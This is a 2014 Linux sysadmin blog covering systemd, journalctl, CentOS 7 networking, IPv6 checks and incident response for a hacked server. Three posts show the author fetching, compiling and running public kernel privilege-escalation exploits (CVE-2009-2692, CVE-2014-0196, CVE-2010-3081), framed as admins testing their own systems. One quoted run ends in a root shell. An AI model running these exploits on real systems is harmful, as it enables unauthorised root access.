jsonformats entries as JSON data structures, one per line (see Journal JSON Format[2] for more information).
json-prettyformats entries as JSON data structures, but formats them in multiple lines in order to make them more readable for humans.
json-sseformats entries as JSON data structures, but wraps them in a format suitable for Server-Sent Events[3].
catgenerates a very terse output only showing the actual message of each journal entry with no meta data, not even a timestamp.

json would probably comes in mind to display the logging on web interface.

There is also a feature known as Foward Secure Sealing where the log will be encrypted using a sealing key and the log can be verified using a verification key. You can check on parameter such as, --setup-keys --interval --verify --verify-key. We won't cover FFS in this article, perhaps sometime in the future, I will devote an article on how to set this up.

There are also many other good option that help you analyze the log using different strategy like -b, -p and logical operator but that this article should be able to give you a head start. You can find more information through journalctl manual.

Friday, September 26, 2014

transition from sysV to systemd, from chkconfig to systemctl

If you have just been installed CentOS 7.0 and as usual, command chkconfig is executed
to list what processes will be start on boot. As seen below:
[root@localhost ~]# chkconfig

Note: This output shows SysV services only and does not include native
systemd services. SysV configuration data might be overridden by native
systemd configuration.

If you want to list systemd services use 'systemctl list-unit-files'.
To see services enabled on particular target use
'systemctl list-dependencies [target]'.

iprdump 0:off 1:off 2:on 3:on 4:on 5:on 6:off
iprinit 0:off 1:off 2:on 3:on 4:on 5:on 6:off
iprupdate 0:off 1:off 2:on 3:on 4:on 5:on 6:off
network 0:off 1:off 2:on 3:on 4:on 5:on 6:off
tomcat 0:off 1:off 2:off 3:off 4:off 5:off 6:off

That's odd, something has changed. For your information, sysV has been replaced in favor of systemd and today we are going to learn what is systemd is. So what is systemd ?

systemd is a system and service manager for Linux, compatible with SysV and LSB init scripts. systemd provides aggressive parallelization capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, keeps track of processes using Linux cgroups, supports snapshotting and restoring of the system state, maintains mount and automount points and implements an elaborate transactional dependency-based service control logic. It can work as a drop-in replacement for sysvinit. 

That is a very lengthy definition. If you are still not so sure, perhaps take a moment to watch a video here.



Because there are a lot of documentations in the google to explain what is systemd in details, but this article will target busy people who need the solution right now. As such, if you want more details solutions, you should google or read a few helpful links below.

So why replace sysV with systemd? What have been improved?

Lennart Poettering and Kay Sievers, the software engineers who initially developed systemd,[1] sought to surpass the efficiency of the init daemon in several ways. They wanted to improve the software framework for expressing dependencies; to allow more processing to be done concurrently or in parallel during system booting; and to reduce the computational overhead of the shell.

Systemd's initialization instructions for each daemon are recorded in a declarative configuration file rather than a shell script. For inter-process communication, systemd makes Unix domain sockets and D-Bus available to the running daemons. Systemd is also capable of aggressive parallelization.

There are several tools to manage systemd.

  • systemctl:
    used to introspect and control the state of the systemd system and service manager

  • systemd-cgls:
    recursively shows the contents of the selected Linux control group hierarchy in a tree

  • systemadm:
    a graphical frontend for the systemd system and service manager that allows introspection and control of systemd. Part of the systemd-gtk package. This is an early version and needs more work. Do not use it for now unless you are a developer.


Below are a table to summarize what you usually done in chkconfig and in systemd, what command you can use as a replacement.











































































Sysvinit CommandSystemd CommandNotes
service frobozz startsystemctl start frobozz.serviceUsed to start a service (not reboot persistent)
service frobozz stopsystemctl stop frobozz.serviceUsed to stop a service (not reboot persistent)
service frobozz restartsystemctl restart frobozz.serviceUsed to stop and then start a service
service frobozz reloadsystemctl reload frobozz.serviceWhen supported, reloads the config file without interrupting pending operations.
service frobozz condrestartsystemctl condrestart frobozz.serviceRestarts if the service is already running.
service frobozz statussystemctl status frobozz.serviceTells whether a service is currently running.
ls /etc/rc.d/init.d/systemctl list-unit-files --type=service (preferred)
ls /lib/systemd/system/*.service /etc/systemd/system/*.service
Used to list the services that can be started or stopped Used to list all the services and other units
chkconfig frobozz onsystemctl enable frobozz.serviceTurn the service on, for start at next boot, or other trigger.
chkconfig frobozz offsystemctl disable frobozz.serviceTurn the service off for the next reboot, or any other trigger.
chkconfig frobozzsystemctl is-enabled frobozz.serviceUsed to check whether a service is configured to start or not in the current environment.
chkconfig --listsystemctl list-unit-files --type=service(preferred)
ls /etc/systemd/system/*.wants/
Print a table of services that lists which runlevels each is configured on or off
chkconfig frobozz --listls /etc/systemd/system/*.wants/frobozz.serviceUsed to list what levels this service is configured on or off
chkconfig frobozz --addsystemctl daemon-reloadUsed when you create a new service file or modify any configuration

Runlevels/targets

Systemd has a concept of targets which serve a similar purpose as runlevels but act a little different. Each target is named instead of numbered and is intended to serve a specific purpose.













































Sysvinit RunlevelSystemd TargetNotes
0runlevel0.target, poweroff.targetHalt the system.
1, s, singlerunlevel1.target, rescue.targetSingle user mode.
2, 4runlevel2.target, runlevel4.target, multi-user.targetUser-defined/Site-specific runlevels. By default, identical to 3.
3runlevel3.target, multi-user.targetMulti-user, non-graphical. Users can usually login via multiple consoles or via the network.
5runlevel5.target, graphical.targetMulti-user, graphical. Usually has all the services of runlevel 3 plus a graphical login.
6runlevel6.target, reboot.targetReboot
emergencyemergency.targetEmergency shell

Below are a summarize the command you will (hopefully) use.

  • systemctl isolate multi-user.target
    To change the target/runlevel, to switch to runlevel 3

  • systemctl set-default <name of target>.target
    graphical.target is the default. You might want multi-user.target for the equivalent of non graphical (runlevel 3) from sysv init.

  • systemctl get-default
    to show the currentl target/runlevel


Note, there are several changes you should keep in mind.
* systemd does not use /etc/inittab file.
* change number of gettys in /etc/systemd/logind.conf
* unit files are now store in /usr/lib/systemd/system/

That's it, I hope you get a basic understanding and will be able to start using systemd.

Saturday, September 13, 2014

How to check if Debian Jessie, Ubuntu Trusty, Nokia N900 if it IPv6 ready?

With recent rise of IPv6 usage, it is imperative that we understand if our devices are ready for IPv6. Linux kernel supported IPv6 as early as year 1996! Chances are, all these distributions should be IPv6 ready. But for the sake to be sure and learning the basic, we will check these distribution to be sure.

To check, launch a terminal and execute this command as a user.
$ cat /proc/net/if_inet6
fe80000000000000022401fffed782ea 03 40 20 80 eth2
00000000000000000000000000000001 01 80 10 80 lo

You should see the above output and if you are not , maybe the kernel is not compile with ipv6 module. If so, you can enable it and check if it loaded.

# modprobe ipv6
# lsmod | grep ipv6
ipv6 237436 14

You can run the above commands for all the devices, they are all IPv6 ready.



There are many articles out there to disable IPv6 but with the depletion of IPv4 addresses, I think this practice should not continue but be ready and prepared for it. Of cause unless you got good reason not to use IPv6.

Friday, September 12, 2014

Understand basic network configuration in CentOS 7

With the recent release of CentOS7, today we are going to check out the basic network configuration. My usual quick command, ifconfig.
[root@localhost ~]# ifconfig
-bash: ifconfig: command not found

it seem like ifconfig is not longer there, note that if you do upgrade from centos 6.x , you should be aware of this. If you are going to configure network interface, start to get familiar to command ip. But if you want command ifconfig, you can still install the package net-tools.

Let's restart network interface.
[root@centos7-test1 network-scripts]# service network restart
Restarting network (via systemctl): [ OK ]
[root@centos7-test1 network-scripts]# service network status
Configured devices:
lo eth0
Currently active devices:
lo eth0
[root@centos7-test1 init.d]# systemctl restart network
[root@centos7-test1 init.d]# systemctl status network
network.service - LSB: Bring up/down networking
Loaded: loaded (/etc/rc.d/init.d/network)
Active: active (exited) since Tue 2014-07-15 14:33:28 CEST; 13s ago
Process: 11597 ExecStop=/etc/rc.d/init.d/network stop (code=exited, status=0/SUCCESS)
Process: 11753 ExecStart=/etc/rc.d/init.d/network start (code=exited, status=0/SUCCESS)

Jul 15 14:33:27 centos7-test1 network[11753]: Bringing up loopback interface: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:27 centos7-test1 network[11753]: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:27 centos7-test1 network[11753]: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:28 centos7-test1 network[11753]: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:28 centos7-test1 network[11753]: [ OK ]
Jul 15 14:33:28 centos7-test1 network[11753]: Bringing up interface eth0: Connection successfully activated (D-Bus active path: /org/...tion/3)
Jul 15 14:33:28 centos7-test1 network[11753]: [ OK ]
Jul 15 14:33:28 centos7-test1 systemd[1]: Started LSB: Bring up/down networking.
Hint: Some lines were ellipsized, use -l to show in full.

Noticed that service manager now is done via systemctl, C7 is using systemctl in replace of SysV.  Also notice configuration file for ifcfg-lo is not loadable? This issue has been file here.

Upstream has changed the default networking service is provided by NetworkManager, which is a dynamic network control and configuration daemon that attempts to keep network devices and connections up and active when they are available.

If it does not install for any reason (which it should not because it comes with predefault installation), you can follow these commands
# # install it
# yum install NetworkManager
# # ensure network manager service is started everything system boot up.
# systemctl enable NetworkManager
# # manual start for now.
# systemctl start NetworkManager
# # check the status.
[root@centos7-test1 ~]# systemctl status NetworkManager
NetworkManager.service - Network Manager
Loaded: loaded (/usr/lib/systemd/system/NetworkManager.service; enabled)
Active: active (running) since Tue 2014-07-15 13:39:18 CEST; 3h 40min ago
Main PID: 679 (NetworkManager)
CGroup: /system.slice/NetworkManager.service
├─ 679 /usr/sbin/NetworkManager --no-daemon
└─11896 /sbin/dhclient -d -sf /usr/libexec/nm-dhcp-helper -pf /var/run/dhclient-eth0.pid -lf /var/lib/NetworkManager/dhclient-55911be2-9763-471f...

Jul 15 17:05:21 centos7-test1 NetworkManager[679]: bound to 192.168.0.116 -- renewal in 3581 seconds.
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> (eth0): DHCPv4 state changed renew -> renew
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> address 192.168.0.116
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> plen 24 (255.255.255.0)
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> gateway 192.168.0.1
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> server identifier 192.168.0.1
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> lease time 7200
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> nameserver '192.168.0.1'
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> nameserver '8.8.8.8'
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> domain name 'PowerRanger'

If you are configuring manually remotely, you can use command nmtui. nmtui is a simple curses-based text user interface. But if you want to configure interface using script, better still to use command ip or nmcli. For more information, you can read here.

That's it for this article. I would like to thank my buddy for kind enough to let me ssh and study centos 7 in his host. :) you know who you are! dankeschon!

Saturday, August 30, 2014

What should you do if the server you administered got hacked.

If you realized that your server has been compromised, this discovery will create confusion, reduce confidence and if the server is serving user requests, you have to declare down time. That's not good.

In order to restore service as quickly as possible, it is best if you have a server ready to replace instantly, that you can reduce the noise from the customers. But in order to prevent such attack coming in the future, you must at least identify how it happened and taking counter measurement.

In this article, we will learn how to discover, and then taking counter measure.

Quick solution.

Probably the quickest solution is to format and reinstall the operating system together with your applications that serve user requests. This probably is good if you do not have a backup server and you want to reinstate the server to serve user requests as soon as possible. But this does not solve the actual problem on how the hacked took place. Hence, it might happen again in the near future.

Long and workable solution.

  1. identify your own custom application deployed and start to investigate from there.

  2. update the system using package manager and restart system.

  3. tighten up security


identify your own custom application deployed and start to investigate from there.

Because open source are mostly tested well and updated often, the first place you are going to investigate mostly come from your own application. Hence, you must at least have good understanding about your app and so to quickly identify source of problem.

Following are a sets of commands which might able to help you in your investigation.

  • w
    who is on the server

  • sudo netstat -nalp | grep ":22"
    change 22 to your application listen to. check if there is any abnormally.

  • if you are using opensource for your custom applications, check the log as well. For which attacker will always find the exploit for the opensource softwares and started to target those.


update the system using package manager and restart system.

First you can start by checking.

  • last
    check when was invalid last access.

  • cat /var/log/secure* | grep Accept
    check invalid access.

  • ps -elf
    check if the malware is running and if you spot one, get the process where it run from and delete all malware files.

  • ls /tmp /var/tmp /dev/shm -la
    this directory normally allow process to write in, so you might want to check any fishy files here.

  • file <filename>
    check what type of the file.

  • cat /etc/passwd
    check if there is unknown entry which is not supposed to be there.

  • sudo netstat -plant |awk ' /^tcp/ {split($7, a, "/"); print $6, a[2]}' |sort | uniq -c | sort -n| tail
    4 ESTABLISHED java
    4 LISTEN kadmind
    5 LISTEN java
    5 LISTEN python
    6 ESTABLISHED python
    if your server has been turned into a trojan, the malware will probably launching a lot of ddos, with this command, you should be able to identify if the cp connection has been spike.

  • sudo netstat -plant | awk '$4 ~ /:22$/ {print $5}' | cut -f1 -d: | sort | uniq -c | sort -n
    1
    1 0.0.0.0
    2 192.168.0.2
    check total connection established to your server on port 22.

  • sudo netstat -plant | awk '/^tcp/ {print $6}' | sort | uniq -c | sort -n
    2 CLOSING
    4 SYN_RECV
    5 LAST_ACK
    6 FIN_WAIT1
    12 LISTEN
    13 FIN_WAIT2
    344 TIME_WAIT
    977 ESTABLISHED
    check network states, this is a good information should your server suddenly spike in the state established or state syn. if there is any spike, you will know something maybe gone fishy.

  • $HOME/.bash_history
    check every users bash_history to see if there is any suspect. If the server application run user a user id, especially check the bash_history in the user home directory.

  • find / -mtime 5
    find what files has been changes since 5 days ago.


If there is nothing found, just update the system packages using package manager and reboot the system.

tighten up security and monitor

if you have a loose firewall policy (iptables or some hardware firewall), you should review it.

Prevention in the future would probably notify when the count of TCP connection exceed or suddenly spike to a threshold.

 

whilst these steps are not exhaustive, as evil people always come with different type attacks, thus you should be prepare and be alert. Gather information using google as well.

Sunday, August 17, 2014

CVE-2009-2692 Linux NULL pointer dereference due to incorrect proto_ops initializations

Again as same with previous cve posts, I would like to express the intention of this article is to protect and safeguard of administrators / developers who make a living for their family by maintaining computer system for company. This blog is to make aware for those who run linux operating system and you should be aware of it and protect against the malicious attack. I take no responsibility if you and/or your evil minded take this to damage others.

This source (or you can download original source here) is written in c and it require some level of understanding into linux system as well. You should find explanation for the source exploit.c herehere or here.  As explain in the documentation, this exploit mainly target this kernel version:

  • kernel 2.6.0 to 2.6.30.4

  • kernel 2.4.4 to 2.4.37.4


So check your system if your server kernel falled within this range and do a kernel update if it does as there is already fixed.

According to the cve, description for this exploit

The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, does not initialize all function pointers for socket operations in proto_ops structures, which allows local users to trigger a NULL pointer dereference and gain privileges by using mmap to map page zero, placing arbitrary code on this page, and then invoking an unavailable operation, as demonstrated by the sendpage operation (sock_sendpage function) on a PF_PPPOX socket.

Okay, let's download the source and try it.
user@localhost:~/Desktop/exploit/wunderbar_emporium$ whoami
user
user@localhost:~/Desktop/exploit/wunderbar_emporium$ sh -x wunderbar_emporium.sh
++ pwd
++ sed 's/\//\\\//g'
+ ESCAPED_PWD='\/home\/user\/Desktop\/exploit\/wunderbar_emporium'
+ sed 's/\/home\/spender/\/home\/user\/Desktop\/exploit\/wunderbar_emporium/g' pwnkernel.c
+ mv pwnkernel.c pwnkernel2.c
+ mv pwnkernel1.c pwnkernel.c
+ killall -9 pulseaudio
++ uname -p
+ IS_64=unknown
+ OPT_FLAG=
+ '[' unknown = x86_64 ']'
++ cat /proc/sys/vm/mmap_min_addr
+ MINADDR=65536
+ '[' 65536 = '' -o 65536 = 0 ']'
+ '[' '!' -f /usr/sbin/getenforce ']'
+ cc -fno-stack-protector -fPIC -shared -o exploit.so exploit.c
+ cc -o pwnkernel pwnkernel.c
+ ./pwnkernel
[+] Personality set to: PER_SVR4
Pulseaudio is not suid root!
+ mv -f pwnkernel2.c pwnkernel.c
user@localhostp:~/Desktop/exploit/wunderbar_emporium$ whoami
user

So this server is not vulnerable for this exploit! All good.

Friday, August 15, 2014

information for malware Linux_time_y_2014 and Linux_time_y_2015 are needed

This article is a bit special. It is more like seeking information and documentating it. If you have this type of information, please leave your comment below.

If you have noticed that the followings file exists in your system

  • Linux_time_y_2014

  • Linux_time_y_2015 or xudp

  • .E7739C9DFEAC5B8A69A114E45AB327D41 or mysql1.0

  • .E7739C9DFEAC5B8A69A114E45AB327D4 or mysql1s


This is a malwares which if it is uploaded or copy to your server, you should check if it is running in the system and remove if it does.

I googled and search in social sites, there is not much information other than identified this as a malware. If you happened to know what cve or where is the source, please kindly leave the message in the comment.

The intention is to understand what does this malware does other than launching it as ddos. To document it down here and to provide information to others if they seek more information. If you know how to disect this binary and analyze the content, please do share as well.

Thank you.

Sunday, August 3, 2014

CVE-2014-0196 kernel: pty layer race condition leading to memory corruption

First off, I would like to express the intention of this article is to protect and safeguard of administrators / developers who make a living for their family by maintaining computer system for company. This blog is to make aware for those who run linux operating system and you should be aware of it and protect against the malicious attack. I take no responsibility if you and/or your evil minded take this to damage others.

This source is written in c and it require some level of understanding into linux system as well. You should find explanation for the source cve-2014-0196-md.c here. If you run an old system, then you might want to read more. But check your kernel that comes with your distribution, it may already been fixed.

From the description:

The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the "LECHO & !OPOST" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings.

Okay, let's move on to compile and test it out.
user@localhost:~$ wget -O cve-2014-0196-md.c http://bugfuzz.com/stuff/cve-2014-0196-md.c
user@localhost:~$ gcc cve-2014-0196-md.c -lutil -lpthread
user@localhost:~$ ./a.out
[+] Resolving symbols
[+] Resolved commit_creds: 0xffffffff8105bb28
[+] Resolved prepare_kernel_cred: 0xffffffff8105bd3b
[+] Doing once-off allocations
[+] Attempting to overflow into a tty_struct......
........................................................................................................................................................................................................................................................................................................................................................................................................................^C

Apparently this kernel is not vulnerable to this exploit. Another great day. :-)

Friday, July 25, 2014

CVE-2010-3081 Ac1dB1tch3z

First off, I would like to express the intention of this article is to protect and safeguard of administrators / developers who make a living for their family by maintaining computer system for company. This blog is to make aware for those who run linux operating system and you should be aware of it and protect against the malicious attack. I take no responsibility if you and/or your evil minded take this to damage others.

This exploit only vulnerable to kernel version 2.6.26-rc1 to 2.6.36-rc4. So be
alert if your production server are runnning these kernel. It has since been
fixed in the upstream as it can be found here.

So what is this exploit about?

A vulnerability in the 32-bit compatibility layer for 64-bit systems was reported. It is caused by insecure allocation of user space memory when translating system call inputs to 64-bit. A stack pointer underflow can occur when using the "compat_alloc_user_space" method inside arch/x86/include/asm/compat.h with an arbitrary length input.

or the long description here and here

Get the source here and compile it.
user@localhost:~$ gcc -m32 15024.c -o 15024
user@localhost:~$ ./15024
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
!!! Un4bl3 t0 g3t r3l3as3 wh4t th3 fuq!

If the kernel is vulnerable to this exploit, check output below.
[bob@xxx ~]$ date
Sun Sep 19 18:22:38 BRT 2010
[bob@xxx ~]$ cat /etc/redhat-release
Red Hat Enterprise Linux Server release 5.5 (Tikanga)
[bob@xxx ~]$ uname -a
Linux xxx 2.6.18-194.11.3.el5 #1 SMP Mon Aug 23 15:51:38 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
[bob@xxx ~]$ id
uid=500(bob) gid=500(bob) groups=500(bob)
[bob@xxx ~]$ ./15024
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.11.3.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# id
uid=0(root) gid=500(bob) groups=500(bob)

That's it! Stay safe.